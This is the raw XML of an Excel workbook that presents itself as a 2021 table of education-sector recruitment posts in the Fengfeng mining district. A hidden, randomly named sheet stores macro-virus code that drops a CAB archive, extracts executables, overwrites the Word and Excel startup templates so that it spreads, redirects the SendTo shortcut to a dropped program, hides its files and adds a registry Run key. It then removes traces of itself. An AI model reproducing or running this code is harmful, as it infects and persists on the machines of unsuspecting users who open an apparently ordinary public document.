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firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="664VOHG8XQPIBZ" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="附1" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="Counter" localSheetId="0">'664VOHG8XQPIBZ'!$C$82</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">'附1'!$A$1:$W$19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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="157" uniqueCount="141">
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>End Sub</t>
  </si>
  <si>
    <r>
      <t>附件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：</t>
    </r>
  </si>
  <si>
    <r>
      <t>峰峰矿区政府系统</t>
    </r>
    <r>
      <rPr>
        <sz val="18"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>2021</t>
    </r>
    <r>
      <rPr>
        <sz val="18"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>年事业单位公开招聘岗位、条件一览表（教育类）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>序号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>招聘单位主管部门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>招聘岗位</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>经费供养方式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>岗位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类别</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>学段层次代码</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>各岗位招聘人数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>专业代码</t>
    </r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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>备注</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>小计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>教师岗位</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>语文</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>数学</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>英语</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>物理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>政治</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>历史</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>地理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>化学</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>生物</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>体育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>音乐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>美术</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>信息技术</t>
    </r>
  </si>
  <si>
    <t>幼教</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>科学</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>峰峰矿区教体局</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>高中教师</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>全额事业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>专技初级</t>
    </r>
  </si>
  <si>
    <t>A01</t>
  </si>
  <si>
    <t>B02</t>
  </si>
  <si>
    <r>
      <t>限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高校毕业生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报考</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>初中教师</t>
    </r>
  </si>
  <si>
    <t>A03</t>
  </si>
  <si>
    <t>B04</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>限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高校毕业生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报考</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>小学教师</t>
    </r>
  </si>
  <si>
    <t>A05</t>
  </si>
  <si>
    <t>B06</t>
  </si>
  <si>
    <t>幼儿园教师</t>
  </si>
  <si>
    <t>全额事业</t>
  </si>
  <si>
    <t>专技初级</t>
  </si>
  <si>
    <t>A07</t>
  </si>
  <si>
    <t>B08</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>小学教师</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>（定向招聘岗位）</t>
    </r>
  </si>
  <si>
    <t>A09</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>说明：</t>
    </r>
  </si>
  <si>
    <t>报考岗位代码（四位组成）=学段层次代码+专业代码。例如：高中语文学科的报考岗位代码是A0101,高中语文限“高校毕业生”报考学科的报考岗位代码是B0201。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</si>
</sst>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sz val="18"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="1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0"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="9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9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4" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="17" fillId="2" borderId="1" applyNumberFormat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4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9" fillId="0" borderId="4" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="5" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="24" fillId="8" borderId="6" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="26" fillId="8" borderId="1" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="30" fillId="14" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="8" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="28" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="32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13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18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8" fillId="19" borderId="0" applyNumberFormat="0" applyBorder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8" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18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8" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="19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18" fillId="19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35" fillId="0" borderId="14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3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93">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="93" applyNumberFormat="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="93" applyNumberFormat="1" applyFont="1">
      <alignment/>
      <protection/>
    </xf>
  </cellXfs>
  <cellStyles count="85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差_2014招聘计划" xfId="84"/>
    <cellStyle name="差_Sheet1" xfId="85"/>
    <cellStyle name="常规 15" xfId="86"/>
    <cellStyle name="常规 16" xfId="87"/>
    <cellStyle name="常规 17" xfId="88"/>
    <cellStyle name="常规 18" xfId="89"/>
    <cellStyle name="常规 19" xfId="90"/>
    <cellStyle name="常规 2" xfId="91"/>
    <cellStyle name="常规 4" xfId="92"/>
    <cellStyle name="常规_norma1" xfId="93"/>
    <cellStyle name="好_2014招聘计划" xfId="94"/>
    <cellStyle name="好_Sheet1" xfId="95"/>
    <cellStyle name="着色 3" xfId="96"/>
    <cellStyle name="着色 4" xfId="97"/>
    <cellStyle name="着色 6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C82"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0" topLeftCell="G1">
      <selection activeCell="F1" sqref="A1:F16384"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="19.25390625" style="55" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" style="0" hidden="1" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="56" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="9.00390625" style="55" hidden="1" customWidth="1"/>
    <col min="7" max="16384" width="9.00390625" style="55" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25">
      <c r="C1" s="56" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="14.25">
      <c r="C2" s="56" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="15.75">
      <c r="C3" s="57" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="4" ht="14.25">
      <c r="C4" s="56" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="5" ht="14.25">
      <c r="C5" s="56" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="6" ht="14.25">
      <c r="C6" s="56" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="7" ht="14.25">
      <c r="C7" s="56" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8" ht="14.25">
      <c r="C8" s="56" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="9" ht="14.25">
      <c r="C9" s="56" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" ht="15.75">
      <c r="C10" s="57" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="11" ht="15.75">
      <c r="C11" s="57" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="12" ht="15.75">
      <c r="C12" s="57" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="13" ht="14.25">
      <c r="C13" s="56" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="14" ht="15.75">
      <c r="C14" s="57" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="15" ht="15.75">
      <c r="C15" s="57" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="16" ht="15.75">
      <c r="C16" s="57" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="17" ht="15.75">
      <c r="C17" s="57" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" ht="15.75">
      <c r="C18" s="57" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="19" ht="15.75">
      <c r="C19" s="57" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="20" ht="15.75">
      <c r="C20" s="57" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="21" ht="14.25">
      <c r="C21" s="56" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="22" ht="14.25">
      <c r="C22" s="56" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="23" ht="15.75">
      <c r="C23" s="57" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="24" ht="15.75">
      <c r="C24" s="57" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="25" ht="14.25">
      <c r="C25" s="56" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="26" ht="15.75">
      <c r="C26" s="57" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="27" ht="15.75">
      <c r="C27" s="57" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="28" ht="15.75">
      <c r="C28" s="57" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="29" ht="15.75">
      <c r="C29" s="57" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="30" ht="15.75">
      <c r="C30" s="57" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="31" ht="15.75">
      <c r="C31" s="57" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="32" ht="15.75">
      <c r="C32" s="57" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="33" ht="15.75">
      <c r="C33" s="57" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="34" ht="15.75">
      <c r="C34" s="57" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="35" ht="14.25">
      <c r="C35" s="56" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="36" ht="15.75">
      <c r="C36" s="57" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="37" ht="14.25">
      <c r="C37" s="56" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="38" ht="14.25">
      <c r="C38" s="56" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="39" ht="14.25">
      <c r="C39" s="56" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="40" ht="14.25">
      <c r="C40" s="56" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="41" ht="14.25">
      <c r="C41" s="56" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="42" ht="14.25">
      <c r="C42" s="56" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="43" ht="15.75">
      <c r="C43" s="57" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="44" ht="15.75">
      <c r="C44" s="57" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="45" ht="15.75">
      <c r="C45" s="57" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="46" ht="14.25">
      <c r="C46" s="56" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="47" ht="14.25">
      <c r="C47" s="56" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="48" ht="14.25">
      <c r="C48" s="56" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="49" ht="14.25">
      <c r="C49" s="56" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="50" ht="14.25">
      <c r="C50" s="56" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="51" ht="15.75">
      <c r="C51" s="57" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="52" ht="15.75">
      <c r="C52" s="56" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="53" ht="15.75">
      <c r="C53" s="57" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="54" ht="15.75">
      <c r="C54" s="57" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="55" ht="15.75">
      <c r="C55" s="57" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="56" ht="15.75">
      <c r="C56" s="57" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="57" ht="15.75">
      <c r="C57" s="57" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="58" ht="15.75">
      <c r="C58" s="57" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="59" ht="15.75">
      <c r="C59" s="57" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="60" ht="15.75">
      <c r="C60" s="57" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="61" ht="15.75">
      <c r="C61" s="57" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="62" ht="15.75">
      <c r="C62" s="57" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="63" ht="14.25">
      <c r="C63" s="56" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="64" ht="14.25">
      <c r="C64" s="56" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="65" ht="14.25">
      <c r="C65" s="56" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="66" ht="14.25">
      <c r="C66" s="56" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="67" ht="14.25">
      <c r="C67" s="56" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="68" ht="15.75">
      <c r="C68" s="57" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="69" ht="15.75">
      <c r="C69" s="57" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="70" ht="15.75">
      <c r="C70" s="57" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="71" ht="15.75">
      <c r="C71" s="57" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="72" ht="15.75">
      <c r="C72" s="57" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="73" ht="15.75">
      <c r="C73" s="57" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="74" ht="14.25">
      <c r="C74" s="56" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="75" ht="15.75">
      <c r="C75" s="57" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="76" ht="15.75">
      <c r="C76" s="57" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="77" ht="14.25">
      <c r="C77" s="56" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="78" ht="15.75">
      <c r="C78" s="57" t="s">
